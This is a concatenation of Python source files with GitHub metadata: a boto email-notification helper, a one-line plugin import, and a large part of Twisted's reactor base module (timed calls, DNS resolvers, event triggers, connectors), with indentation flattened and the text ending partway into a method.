def notify(subject, body=None, html_body=None, to_string=None, attachments=[], append_instance_id=True):
if append_instance_id:
subject = "[%s] %s" % (boto.config.get_value("Instance", "instance-id"), subject)
if not to_string:
to_string = boto.config.get_value('Notification', 'smtp_to', None)
if to_string:
try:
from_string = boto.config.get_value('Notification', 'smtp_from', 'boto')
msg = MIMEMultipart()
msg['From'] = from_string
msg['To'] = to_string
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
if body:
msg.attach(MIMEText(body))
if html_body:
part = MIMEBase('text', 'html')
part.set_payload(html_body)
Encoders.encode_base64(part)
msg.attach(part)
for part in attachments:
msg.attach(part)
smtp_host = boto.config.get_value('Notification', 'smtp_host', 'localhost')
# Alternate port support
if boto.config.get_value("Notification", "smtp_port"):
server = smtplib.SMTP(smtp_host, int(boto.config.get_value("Notification", "smtp_port")))
else:
server = smtplib.SMTP(smtp_host)
# TLS support
if boto.config.getbool("Notification", "smtp_tls"):
server.ehlo()
server.starttls()
server.ehlo()
smtp_user = boto.config.get_value('Notification', 'smtp_user', '')
smtp_pass = boto.config.get_value('Notification', 'smtp_pass', '')
if smtp_user:
server.login(smtp_user, smtp_pass)
server.sendmail(from_string, to_string, msg.as_string())
server.quit()
except:
boto.log.exception('notify failed')
| {
"content_hash": "3aeb59d987f21da05e53231f94a1323f",
"timestamp": "",
"source": "github",
"line_count": 527,
"max_line_length": 105,
"avg_line_length": 31.874762808349146,
"alnum_prop": 0.5601857363971902,
"repo_name": "sorenh/cc",
"id": "255d42f6419b509881026ee7275bd346a318179b",
"size": "18545",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "vendor/boto/boto/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "707"
},
{
"name": "Python",
"bytes": "398663"
},
{
"name": "Shell",
"bytes": "12374"
}
],
"symlink_target": ""
} |
from .random_article import *
| {
"content_hash": "244e0d34c4dca3823be76a359265952b",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 29,
"avg_line_length": 30,
"alnum_prop": 0.7666666666666667,
"repo_name": "Naereen/cuisine",
"id": "b59a6a03a193acf519225f4f9771ddd002d994fb",
"size": "30",
"binary": false,
"copies": "78",
"ref": "refs/heads/master",
"path": "plugins/random_article/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "108439"
},
{
"name": "HTML",
"bytes": "16416"
},
{
"name": "Makefile",
"bytes": "4071"
},
{
"name": "Python",
"bytes": "111371"
},
{
"name": "Shell",
"bytes": "2537"
}
],
"symlink_target": ""
} |
"""
Very basic functionality for a Reactor implementation.
"""
from __future__ import division, absolute_import
import socket # needed only for sync-dns
from zope.interface import implementer, classImplements
import sys
import warnings
from heapq import heappush, heappop, heapify
import traceback
from twisted.internet.interfaces import (
IReactorCore, IReactorTime, IReactorThreads, IResolverSimple,
IReactorPluggableResolver, IReactorPluggableNameResolver, IConnector,
IDelayedCall,
)
from twisted.internet import fdesc, main, error, abstract, defer, threads
from twisted.internet._resolver import (
GAIResolver as _GAIResolver,
ComplexResolverSimplifier as _ComplexResolverSimplifier,
SimpleResolverComplexifier as _SimpleResolverComplexifier,
)
from twisted.python import log, failure, reflect
from twisted.python.compat import unicode, iteritems
from twisted.python.runtime import seconds as runtimeSeconds, platform
from twisted.internet.defer import Deferred, DeferredList
from twisted.python._oldstyle import _oldStyle
# This import is for side-effects! Even if you don't see any code using it
# in this module, don't delete it.
from twisted.python import threadable
@implementer(IDelayedCall)
@_oldStyle
class DelayedCall:
# enable .debug to record creator call stack, and it will be logged if
# an exception occurs while the function is being run
debug = False
_str = None
def __init__(self, time, func, args, kw, cancel, reset,
seconds=runtimeSeconds):
"""
@param time: Seconds from the epoch at which to call C{func}.
@param func: The callable to call.
@param args: The positional arguments to pass to the callable.
@param kw: The keyword arguments to pass to the callable.
@param cancel: A callable which will be called with this
DelayedCall before cancellation.
@param reset: A callable which will be called with this
DelayedCall after changing this DelayedCall's scheduled
execution time. The callable should adjust any necessary
scheduling details to ensure this DelayedCall is invoked
at the new appropriate time.
@param seconds: If provided, a no-argument callable which will be
used to determine the current time any time that information is
needed.
"""
self.time, self.func, self.args, self.kw = time, func, args, kw
self.resetter = reset
self.canceller = cancel
self.seconds = seconds
self.cancelled = self.called = 0
self.delayed_time = 0
if self.debug:
self.creator = traceback.format_stack()[:-2]
def getTime(self):
"""Return the time at which this call will fire
@rtype: C{float}
@return: The number of seconds after the epoch at which this call is
scheduled to be made.
"""
return self.time + self.delayed_time
def cancel(self):
"""Unschedule this call
@raise AlreadyCancelled: Raised if this call has already been
unscheduled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
else:
self.canceller(self)
self.cancelled = 1
if self.debug:
self._str = bytes(self)
del self.func, self.args, self.kw
def reset(self, secondsFromNow):
"""Reschedule this call for a different time
@type secondsFromNow: C{float}
@param secondsFromNow: The number of seconds from the time of the
C{reset} call at which this call will be scheduled.
@raise AlreadyCancelled: Raised if this call has been cancelled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
else:
newTime = self.seconds() + secondsFromNow
if newTime < self.time:
self.delayed_time = 0
self.time = newTime
self.resetter(self)
else:
self.delayed_time = newTime - self.time
def delay(self, secondsLater):
"""Reschedule this call for a later time
@type secondsLater: C{float}
@param secondsLater: The number of seconds after the originally
scheduled time for which to reschedule this call.
@raise AlreadyCancelled: Raised if this call has been cancelled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
else:
self.delayed_time += secondsLater
if self.delayed_time < 0:
self.activate_delay()
self.resetter(self)
def activate_delay(self):
self.time += self.delayed_time
self.delayed_time = 0
def active(self):
"""Determine whether this call is still pending
@rtype: C{bool}
@return: True if this call has not yet been made or cancelled,
False otherwise.
"""
return not (self.cancelled or self.called)
def __le__(self, other):
"""
Implement C{<=} operator between two L{DelayedCall} instances.
Comparison is based on the C{time} attribute (unadjusted by the
delayed time).
"""
return self.time <= other.time
def __lt__(self, other):
"""
Implement C{<} operator between two L{DelayedCall} instances.
Comparison is based on the C{time} attribute (unadjusted by the
delayed time).
"""
return self.time < other.time
def __str__(self):
if self._str is not None:
return self._str
if hasattr(self, 'func'):
# This code should be replaced by a utility function in reflect;
# see ticket #6066:
if hasattr(self.func, '__qualname__'):
func = self.func.__qualname__
elif hasattr(self.func, '__name__'):
func = self.func.func_name
if hasattr(self.func, 'im_class'):
func = self.func.im_class.__name__ + '.' + func
else:
func = reflect.safe_repr(self.func)
else:
func = None
now = self.seconds()
L = ["<DelayedCall 0x%x [%ss] called=%s cancelled=%s" % (
id(self), self.time - now, self.called,
self.cancelled)]
if func is not None:
L.extend((" ", func, "("))
if self.args:
L.append(", ".join([reflect.safe_repr(e) for e in self.args]))
if self.kw:
L.append(", ")
if self.kw:
L.append(", ".join(['%s=%s' % (k, reflect.safe_repr(v)) for (k, v) in self.kw.items()]))
L.append(")")
if self.debug:
L.append("\n\ntraceback at creation: \n\n%s" % (' '.join(self.creator)))
L.append('>')
return "".join(L)
@implementer(IResolverSimple)
class ThreadedResolver(object):
"""
L{ThreadedResolver} uses a reactor, a threadpool, and
L{socket.gethostbyname} to perform name lookups without blocking the
reactor thread. It also supports timeouts indepedently from whatever
timeout logic L{socket.gethostbyname} might have.
@ivar reactor: The reactor the threadpool of which will be used to call
L{socket.gethostbyname} and the I/O thread of which the result will be
delivered.
"""
def __init__(self, reactor):
self.reactor = reactor
self._runningQueries = {}
def _fail(self, name, err):
err = error.DNSLookupError("address %r not found: %s" % (name, err))
return failure.Failure(err)
def _cleanup(self, name, lookupDeferred):
userDeferred, cancelCall = self._runningQueries[lookupDeferred]
del self._runningQueries[lookupDeferred]
userDeferred.errback(self._fail(name, "timeout error"))
def _checkTimeout(self, result, name, lookupDeferred):
try:
userDeferred, cancelCall = self._runningQueries[lookupDeferred]
except KeyError:
pass
else:
del self._runningQueries[lookupDeferred]
cancelCall.cancel()
if isinstance(result, failure.Failure):
userDeferred.errback(self._fail(name, result.getErrorMessage()))
else:
userDeferred.callback(result)
def getHostByName(self, name, timeout = (1, 3, 11, 45)):
"""
See L{twisted.internet.interfaces.IResolverSimple.getHostByName}.
Note that the elements of C{timeout} are summed and the result is used
as a timeout for the lookup. Any intermediate timeout or retry logic
is left up to the platform via L{socket.gethostbyname}.
"""
if timeout:
timeoutDelay = sum(timeout)
else:
timeoutDelay = 60
userDeferred = defer.Deferred()
lookupDeferred = threads.deferToThreadPool(
self.reactor, self.reactor.getThreadPool(),
socket.gethostbyname, name)
cancelCall = self.reactor.callLater(
timeoutDelay, self._cleanup, name, lookupDeferred)
self._runningQueries[lookupDeferred] = (userDeferred, cancelCall)
lookupDeferred.addBoth(self._checkTimeout, name, lookupDeferred)
return userDeferred
@implementer(IResolverSimple)
@_oldStyle
class BlockingResolver:
def getHostByName(self, name, timeout = (1, 3, 11, 45)):
try:
address = socket.gethostbyname(name)
except socket.error:
msg = "address %r not found" % (name,)
err = error.DNSLookupError(msg)
return defer.fail(err)
else:
return defer.succeed(address)
class _ThreePhaseEvent(object):
"""
Collection of callables (with arguments) which can be invoked as a group in
a particular order.
This provides the underlying implementation for the reactor's system event
triggers. An instance of this class tracks triggers for all phases of a
single type of event.
@ivar before: A list of the before-phase triggers containing three-tuples
of a callable, a tuple of positional arguments, and a dict of keyword
arguments
@ivar finishedBefore: A list of the before-phase triggers which have
already been executed. This is only populated in the C{'BEFORE'} state.
@ivar during: A list of the during-phase triggers containing three-tuples
of a callable, a tuple of positional arguments, and a dict of keyword
arguments
@ivar after: A list of the after-phase triggers containing three-tuples
of a callable, a tuple of positional arguments, and a dict of keyword
arguments
@ivar state: A string indicating what is currently going on with this
object. One of C{'BASE'} (for when nothing in particular is happening;
this is the initial value), C{'BEFORE'} (when the before-phase triggers
are in the process of being executed).
"""
def __init__(self):
self.before = []
self.during = []
self.after = []
self.state = 'BASE'
def addTrigger(self, phase, callable, *args, **kwargs):
"""
Add a trigger to the indicate phase.
@param phase: One of C{'before'}, C{'during'}, or C{'after'}.
@param callable: An object to be called when this event is triggered.
@param *args: Positional arguments to pass to C{callable}.
@param **kwargs: Keyword arguments to pass to C{callable}.
@return: An opaque handle which may be passed to L{removeTrigger} to
reverse the effects of calling this method.
"""
if phase not in ('before', 'during', 'after'):
raise KeyError("invalid phase")
getattr(self, phase).append((callable, args, kwargs))
return phase, callable, args, kwargs
def removeTrigger(self, handle):
"""
Remove a previously added trigger callable.
@param handle: An object previously returned by L{addTrigger}. The
trigger added by that call will be removed.
@raise ValueError: If the trigger associated with C{handle} has already
been removed or if C{handle} is not a valid handle.
"""
return getattr(self, 'removeTrigger_' + self.state)(handle)
def removeTrigger_BASE(self, handle):
"""
Just try to remove the trigger.
@see: removeTrigger
"""
try:
phase, callable, args, kwargs = handle
except (TypeError, ValueError):
raise ValueError("invalid trigger handle")
else:
if phase not in ('before', 'during', 'after'):
raise KeyError("invalid phase")
getattr(self, phase).remove((callable, args, kwargs))
def removeTrigger_BEFORE(self, handle):
"""
Remove the trigger if it has yet to be executed, otherwise emit a
warning that in the future an exception will be raised when removing an
already-executed trigger.
@see: removeTrigger
"""
phase, callable, args, kwargs = handle
if phase != 'before':
return self.removeTrigger_BASE(handle)
if (callable, args, kwargs) in self.finishedBefore:
warnings.warn(
"Removing already-fired system event triggers will raise an "
"exception in a future version of Twisted.",
category=DeprecationWarning,
stacklevel=3)
else:
self.removeTrigger_BASE(handle)
def fireEvent(self):
"""
Call the triggers added to this event.
"""
self.state = 'BEFORE'
self.finishedBefore = []
beforeResults = []
while self.before:
callable, args, kwargs = self.before.pop(0)
self.finishedBefore.append((callable, args, kwargs))
try:
result = callable(*args, **kwargs)
except:
log.err()
else:
if isinstance(result, Deferred):
beforeResults.append(result)
DeferredList(beforeResults).addCallback(self._continueFiring)
def _continueFiring(self, ignored):
"""
Call the during and after phase triggers for this event.
"""
self.state = 'BASE'
self.finishedBefore = []
for phase in self.during, self.after:
while phase:
callable, args, kwargs = phase.pop(0)
try:
callable(*args, **kwargs)
except:
log.err()
@implementer(IReactorCore, IReactorTime, IReactorPluggableResolver,
IReactorPluggableNameResolver)
class ReactorBase(object):
"""
Default base class for Reactors.
@type _stopped: C{bool}
@ivar _stopped: A flag which is true between paired calls to C{reactor.run}
and C{reactor.stop}. This should be replaced with an explicit state
machine.
@type _justStopped: C{bool}
@ivar _justStopped: A flag which is true between the time C{reactor.stop}
is called and the time the shutdown system event is fired. This is
used to determine whether that event should be fired after each
iteration through the mainloop. This should be replaced with an
explicit state machine.
@type _started: C{bool}
@ivar _started: A flag which is true from the time C{reactor.run} is called
until the time C{reactor.run} returns. This is used to prevent calls
to C{reactor.run} on a running reactor. This should be replaced with
an explicit state machine.
@ivar running: See L{IReactorCore.running}
@ivar _registerAsIOThread: A flag controlling whether the reactor will
register the thread it is running in as the I/O thread when it starts.
If C{True}, registration will be done, otherwise it will not be.
"""
_registerAsIOThread = True
_stopped = True
installed = False
usingThreads = False
resolver = BlockingResolver()
__name__ = "twisted.internet.reactor"
def __init__(self):
self.threadCallQueue = []
self._eventTriggers = {}
self._pendingTimedCalls = []
self._newTimedCalls = []
self._cancellations = 0
self.running = False
self._started = False
self._justStopped = False
self._startedBefore = False
# reactor internal readers, e.g. the waker.
self._internalReaders = set()
self._nameResolver = None
self.waker = None
# Arrange for the running attribute to change to True at the right time
# and let a subclass possibly do other things at that time (eg install
# signal handlers).
self.addSystemEventTrigger(
'during', 'startup', self._reallyStartRunning)
self.addSystemEventTrigger('during', 'shutdown', self.crash)
self.addSystemEventTrigger('during', 'shutdown', self.disconnectAll)
if platform.supportsThreads():
self._initThreads()
self.installWaker()
# override in subclasses
_lock = None
def installWaker(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement installWaker")
def installResolver(self, resolver):
"""
See L{IReactorPluggableResolver}.
@param resolver: see L{IReactorPluggableResolver}.
@return: see L{IReactorPluggableResolver}.
"""
assert IResolverSimple.providedBy(resolver)
oldResolver = self.resolver
self.resolver = resolver
self._nameResolver = _SimpleResolverComplexifier(resolver)
return oldResolver
def installNameResolver(self, resolver):
"""
See L{IReactorPluggableNameResolver}.
@param resolver: See L{IReactorPluggableNameResolver}.
@return: see L{IReactorPluggableNameResolver}.
"""
previousNameResolver = self._nameResolver
self._nameResolver = resolver
self.resolver = _ComplexResolverSimplifier(resolver)
return previousNameResolver
@property
def nameResolver(self):
"""
Implementation of read-only
L{IReactorPluggableNameResolver.nameResolver}.
"""
return self._nameResolver
def wakeUp(self):
"""
Wake up the event loop.
"""
if self.waker:
self.waker.wakeUp()
# if the waker isn't installed, the reactor isn't running, and
# therefore doesn't need to be woken up
def doIteration(self, delay):
"""
Do one iteration over the readers and writers which have been added.
"""
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement doIteration")
def addReader(self, reader):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement addReader")
def addWriter(self, writer):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement addWriter")
def removeReader(self, reader):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement removeReader")
def removeWriter(self, writer):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement removeWriter")
def removeAll(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement removeAll")
def getReaders(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement getReaders")
def getWriters(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement getWriters")
def resolve(self, name, timeout = (1, 3, 11, 45)):
"""Return a Deferred that will resolve a hostname.
"""
if not name:
# XXX - This is *less than* '::', and will screw up IPv6 servers
return defer.succeed('0.0.0.0')
if abstract.isIPAddress(name):
return defer.succeed(name)
return self.resolver.getHostByName(name, timeout)
# Installation.
# IReactorCore
def stop(self):
"""
See twisted.internet.interfaces.IReactorCore.stop.
"""
if self._stopped:
raise error.ReactorNotRunning(
"Can't stop reactor that isn't running.")
self._stopped = True
self._justStopped = True
self._startedBefore = True
def crash(self):
"""
See twisted.internet.interfaces.IReactorCore.crash.
Reset reactor state tracking attributes and re-initialize certain
state-transition helpers which were set up in C{__init__} but later
destroyed (through use).
"""
self._started = False
self.running = False
self.addSystemEventTrigger(
'during', 'startup', self._reallyStartRunning)
def sigInt(self, *args):
"""Handle a SIGINT interrupt.
"""
log.msg("Received SIGINT, shutting down.")
self.callFromThread(self.stop)
def sigBreak(self, *args):
"""Handle a SIGBREAK interrupt.
"""
log.msg("Received SIGBREAK, shutting down.")
self.callFromThread(self.stop)
def sigTerm(self, *args):
"""Handle a SIGTERM interrupt.
"""
log.msg("Received SIGTERM, shutting down.")
self.callFromThread(self.stop)
def disconnectAll(self):
"""Disconnect every reader, and writer in the system.
"""
selectables = self.removeAll()
for reader in selectables:
log.callWithLogger(reader,
reader.connectionLost,
failure.Failure(main.CONNECTION_LOST))
def iterate(self, delay=0):
"""See twisted.internet.interfaces.IReactorCore.iterate.
"""
self.runUntilCurrent()
self.doIteration(delay)
def fireSystemEvent(self, eventType):
"""See twisted.internet.interfaces.IReactorCore.fireSystemEvent.
"""
event = self._eventTriggers.get(eventType)
if event is not None:
event.fireEvent()
def addSystemEventTrigger(self, _phase, _eventType, _f, *args, **kw):
"""See twisted.internet.interfaces.IReactorCore.addSystemEventTrigger.
"""
assert callable(_f), "%s is not callable" % _f
if _eventType not in self._eventTriggers:
self._eventTriggers[_eventType] = _ThreePhaseEvent()
return (_eventType, self._eventTriggers[_eventType].addTrigger(
_phase, _f, *args, **kw))
def removeSystemEventTrigger(self, triggerID):
"""See twisted.internet.interfaces.IReactorCore.removeSystemEventTrigger.
"""
eventType, handle = triggerID
self._eventTriggers[eventType].removeTrigger(handle)
def callWhenRunning(self, _callable, *args, **kw):
"""See twisted.internet.interfaces.IReactorCore.callWhenRunning.
"""
if self.running:
_callable(*args, **kw)
else:
return self.addSystemEventTrigger('after', 'startup',
_callable, *args, **kw)
def startRunning(self):
"""
Method called when reactor starts: do some initialization and fire
startup events.
Don't call this directly, call reactor.run() instead: it should take
care of calling this.
This method is somewhat misnamed. The reactor will not necessarily be
in the running state by the time this method returns. The only
guarantee is that it will be on its way to the running state.
"""
if self._started:
raise error.ReactorAlreadyRunning()
if self._startedBefore:
raise error.ReactorNotRestartable()
self._started = True
self._stopped = False
if self._registerAsIOThread:
threadable.registerAsIOThread()
self.fireSystemEvent('startup')
def _reallyStartRunning(self):
"""
Method called to transition to the running state. This should happen
in the I{during startup} event trigger phase.
"""
self.running = True
# IReactorTime
seconds = staticmethod(runtimeSeconds)
def callLater(self, _seconds, _f, *args, **kw):
"""See twisted.internet.interfaces.IReactorTime.callLater.
"""
assert callable(_f), "%s is not callable" % _f
assert _seconds >= 0, \
"%s is not greater than or equal to 0 seconds" % (_seconds,)
tple = DelayedCall(self.seconds() + _seconds, _f, args, kw,
self._cancelCallLater,
self._moveCallLaterSooner,
seconds=self.seconds)
self._newTimedCalls.append(tple)
return tple
def _moveCallLaterSooner(self, tple):
# Linear time find: slow.
heap = self._pendingTimedCalls
try:
pos = heap.index(tple)
# Move elt up the heap until it rests at the right place.
elt = heap[pos]
while pos != 0:
parent = (pos-1) // 2
if heap[parent] <= elt:
break
# move parent down
heap[pos] = heap[parent]
pos = parent
heap[pos] = elt
except ValueError:
# element was not found in heap - oh well...
pass
def _cancelCallLater(self, tple):
self._cancellations+=1
def getDelayedCalls(self):
"""
Return all the outstanding delayed calls in the system.
They are returned in no particular order.
This method is not efficient -- it is really only meant for
test cases.
@return: A list of outstanding delayed calls.
@type: L{list} of L{DelayedCall}
"""
return [x for x in (self._pendingTimedCalls + self._newTimedCalls) if not x.cancelled]
def _insertNewDelayedCalls(self):
for call in self._newTimedCalls:
if call.cancelled:
self._cancellations-=1
else:
call.activate_delay()
heappush(self._pendingTimedCalls, call)
self._newTimedCalls = []
def timeout(self):
"""
Determine the longest time the reactor may sleep (waiting on I/O
notification, perhaps) before it must wake up to service a time-related
event.
@return: The maximum number of seconds the reactor may sleep.
@rtype: L{float}
"""
# insert new delayed calls to make sure to include them in timeout value
self._insertNewDelayedCalls()
if not self._pendingTimedCalls:
return None
delay = self._pendingTimedCalls[0].time - self.seconds()
# Pick a somewhat arbitrary maximum possible value for the timeout.
# This value is 2 ** 31 / 1000, which is the number of seconds which can
# be represented as an integer number of milliseconds in a signed 32 bit
# integer. This particular limit is imposed by the epoll_wait(3)
# interface which accepts a timeout as a C "int" type and treats it as
# representing a number of milliseconds.
longest = 2147483
# Don't let the delay be in the past (negative) or exceed a plausible
# maximum (platform-imposed) interval.
return max(0, min(longest, delay))
def runUntilCurrent(self):
"""
Run all pending timed calls.
"""
if self.threadCallQueue:
# Keep track of how many calls we actually make, as we're
# making them, in case another call is added to the queue
# while we're in this loop.
count = 0
total = len(self.threadCallQueue)
for (f, a, kw) in self.threadCallQueue:
try:
f(*a, **kw)
except:
log.err()
count += 1
if count == total:
break
del self.threadCallQueue[:count]
if self.threadCallQueue:
self.wakeUp()
# insert new delayed calls now
self._insertNewDelayedCalls()
now = self.seconds()
while self._pendingTimedCalls and (self._pendingTimedCalls[0].time <= now):
call = heappop(self._pendingTimedCalls)
if call.cancelled:
self._cancellations-=1
continue
if call.delayed_time > 0:
call.activate_delay()
heappush(self._pendingTimedCalls, call)
continue
try:
call.called = 1
call.func(*call.args, **call.kw)
except:
log.deferr()
if hasattr(call, "creator"):
e = "\n"
e += " C: previous exception occurred in " + \
"a DelayedCall created here:\n"
e += " C:"
e += "".join(call.creator).rstrip().replace("\n","\n C:")
e += "\n"
log.msg(e)
if (self._cancellations > 50 and
self._cancellations > len(self._pendingTimedCalls) >> 1):
self._cancellations = 0
self._pendingTimedCalls = [x for x in self._pendingTimedCalls
if not x.cancelled]
heapify(self._pendingTimedCalls)
if self._justStopped:
self._justStopped = False
self.fireSystemEvent("shutdown")
# IReactorProcess
def _checkProcessArgs(self, args, env):
"""
Check for valid arguments and environment to spawnProcess.
@return: A two element tuple giving values to use when creating the
process. The first element of the tuple is a C{list} of C{bytes}
giving the values for argv of the child process. The second element
of the tuple is either L{None} if C{env} was L{None} or a C{dict}
mapping C{bytes} environment keys to C{bytes} environment values.
"""
# Any unicode string which Python would successfully implicitly
# encode to a byte string would have worked before these explicit
# checks were added. Anything which would have failed with a
# UnicodeEncodeError during that implicit encoding step would have
# raised an exception in the child process and that would have been
# a pain in the butt to debug.
#
# So, we will explicitly attempt the same encoding which Python
# would implicitly do later. If it fails, we will report an error
# without ever spawning a child process. If it succeeds, we'll save
# the result so that Python doesn't need to do it implicitly later.
#
# -exarkun
defaultEncoding = sys.getfilesystemencoding()
# Common check function
def argChecker(arg):
"""
Return either L{bytes} or L{None}. If the given value is not
allowable for some reason, L{None} is returned. Otherwise, a
possibly different object which should be used in place of arg is
returned. This forces unicode encoding to happen now, rather than
implicitly later.
"""
if isinstance(arg, unicode):
try:
arg = arg.encode(defaultEncoding)
except UnicodeEncodeError:
return None
if isinstance(arg, bytes) and b'\0' not in arg:
return arg
return None
# Make a few tests to check input validity
if not isinstance(args, (tuple, list)):
raise TypeError("Arguments must be a tuple or list")
outputArgs = []
for arg in args:
arg = argChecker(arg)
if arg is None:
raise TypeError("Arguments contain a non-string value")
else:
outputArgs.append(arg)
outputEnv = None
if env is not None:
outputEnv = {}
for key, val in iteritems(env):
key = argChecker(key)
if key is None:
raise TypeError("Environment contains a non-string key")
val = argChecker(val)
if val is None:
raise TypeError("Environment contains a non-string value")
outputEnv[key] = val
return outputArgs, outputEnv
# IReactorThreads
if platform.supportsThreads():
threadpool = None
# ID of the trigger starting the threadpool
_threadpoolStartupID = None
# ID of the trigger stopping the threadpool
threadpoolShutdownID = None
def _initThreads(self):
self.installNameResolver(_GAIResolver(self, self.getThreadPool))
self.usingThreads = True
def callFromThread(self, f, *args, **kw):
"""
See
L{twisted.internet.interfaces.IReactorFromThreads.callFromThread}.
"""
assert callable(f), "%s is not callable" % (f,)
# lists are thread-safe in CPython, but not in Jython
# this is probably a bug in Jython, but until fixed this code
# won't work in Jython.
self.threadCallQueue.append((f, args, kw))
self.wakeUp()
def _initThreadPool(self):
"""
Create the threadpool accessible with callFromThread.
"""
from twisted.python import threadpool
self.threadpool = threadpool.ThreadPool(
0, 10, 'twisted.internet.reactor')
self._threadpoolStartupID = self.callWhenRunning(
self.threadpool.start)
self.threadpoolShutdownID = self.addSystemEventTrigger(
'during', 'shutdown', self._stopThreadPool)
def _uninstallHandler(self):
pass
def _stopThreadPool(self):
"""
Stop the reactor threadpool. This method is only valid if there
is currently a threadpool (created by L{_initThreadPool}). It
is not intended to be called directly; instead, it will be
called by a shutdown trigger created in L{_initThreadPool}.
"""
triggers = [self._threadpoolStartupID, self.threadpoolShutdownID]
for trigger in filter(None, triggers):
try:
self.removeSystemEventTrigger(trigger)
except ValueError:
pass
self._threadpoolStartupID = None
self.threadpoolShutdownID = None
self.threadpool.stop()
self.threadpool = None
def getThreadPool(self):
"""
See L{twisted.internet.interfaces.IReactorThreads.getThreadPool}.
"""
if self.threadpool is None:
self._initThreadPool()
return self.threadpool
def callInThread(self, _callable, *args, **kwargs):
"""
See L{twisted.internet.interfaces.IReactorInThreads.callInThread}.
"""
self.getThreadPool().callInThread(_callable, *args, **kwargs)
def suggestThreadPoolSize(self, size):
"""
See L{twisted.internet.interfaces.IReactorThreads.suggestThreadPoolSize}.
"""
self.getThreadPool().adjustPoolsize(maxthreads=size)
else:
# This is for signal handlers.
def callFromThread(self, f, *args, **kw):
assert callable(f), "%s is not callable" % (f,)
# See comment in the other callFromThread implementation.
self.threadCallQueue.append((f, args, kw))
if platform.supportsThreads():
classImplements(ReactorBase, IReactorThreads)
@implementer(IConnector)
@_oldStyle
class BaseConnector:
"""Basic implementation of connector.
State can be: "connecting", "connected", "disconnected"
"""
timeoutID = None
factoryStarted = 0
def __init__(self, factory, timeout, reactor):
self.state = "disconnected"
self.reactor = reactor
self.factory = factory
self.timeout = timeout
def disconnect(self):
"""Disconnect whatever our state is."""
if self.state == 'connecting':
self.stopConnecting()
elif self.state == 'connected':
self.transport.loseConnection()
def connect(self):
"""Start connection to remote server."""
if self.state != "disconnected":
raise RuntimeError("can't connect in this state")
self.state = "connecting"
if not self.factoryStarted:
self.factory.doStart()
self.factoryStarted = 1
self.transport = transport = self._makeTransport()
if self.timeout is not None:
self.timeoutID = self.reactor.callLater(self.timeout, transport.failIfNotConnected, error.TimeoutError())
self.factory.startedConnecting(self)
def stopConnecting(self):
"""Stop attempting to connect."""
if self.state != "connecting":
raise error.NotConnectingError("we're not trying to connect")
self.state = "disconnected"
self.transport.failIfNotConnected(error.UserError())
del self.transport
def cancelTimeout(self):
if self.timeoutID is not None:
try:
self.timeoutID.cancel()
except ValueError:
pass
del self.timeoutID
def buildProtocol(self, addr):
self.state = "connected"
self.cancelTimeout()
return self.factory.buildProtocol(addr)
def connectionFailed(self, reason):
self.cancelTimeout()
self.transport = None
self.state = "disconnected"
self.factory.clientConnectionFailed(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def connectionLost(self, reason):
self.state = "disconnected"
self.factory.clientConnectionLost(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def getDestination(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement "
"getDestination")
class BasePort(abstract.FileDescriptor):
"""Basic implementation of a ListeningPort.
Note: This does not actually implement IListeningPort.
"""
addressFamily = None
socketType = None
def createInternetSocket(self):
s = socket.socket(self.addressFamily, self.socketType)
s.setblocking(0)
fdesc._setCloseOnExec(s.fileno())
return s
def doWrite(self):
"""Raises a RuntimeError"""
raise RuntimeError(
"doWrite called on a %s" % reflect.qual(self.__class__))
class _SignalReactorMixin(object):
"""
Private mixin to manage signals: it installs signal handlers at start time,
and define run method.
It can only be used mixed in with L{ReactorBase}, and has to be defined
first in the inheritance (so that method resolution order finds
startRunning first).
@type _installSignalHandlers: C{bool}
@ivar _installSignalHandlers: A flag which indicates whether any signal
handlers will be installed during startup. This includes handlers for
SIGCHLD to monitor child processes, and SIGINT, SIGTERM, and SIGBREAK
to stop the reactor.
"""
_installSignalHandlers = False
def _handleSignals(self):
"""
Install the signal handlers for the Twisted event loop.
"""
try:
import signal
except ImportError:
log.msg("Warning: signal module unavailable -- "
"not installing signal handlers.")
return
if signal.getsignal(signal.SIGINT) == signal.default_int_handler:
# only handle if there isn't already a handler, e.g. for Pdb.
signal.signal(signal.SIGINT, self.sigInt)
signal.signal(signal.SIGTERM, self.sigTerm)
# Catch Ctrl-Break in windows
if hasattr(signal, "SIGBREAK"):
signal.signal(signal.SIGBREAK, self.sigBreak)
def startRunning(self, installSignalHandlers=True):
"""
Extend the base implementation in order to remember whether signal
handlers should be installed later.
@type installSignalHandlers: C{bool}
@param installSignalHandlers: A flag which, if set, indicates that
handlers for a number of (implementation-defined) signals should be
installed during startup.
"""
self._installSignalHandlers = installSignalHandlers
ReactorBase.startRunning(self)
def _reallyStartRunning(self):
"""
Extend the base implementation by also installing signal handlers, if
C{self._installSignalHandlers} is true.
"""
ReactorBase._reallyStartRunning(self)
if self._installSignalHandlers:
# Make sure this happens before after-startup events, since the
# expectation of after-startup is that the reactor is fully
# initialized. Don't do it right away for historical reasons
# (perhaps some before-startup triggers don't want there to be a
# custom SIGCHLD handler so that they can run child processes with
# some blocking api).
self._handleSignals()
def run(self, installSignalHandlers=True):
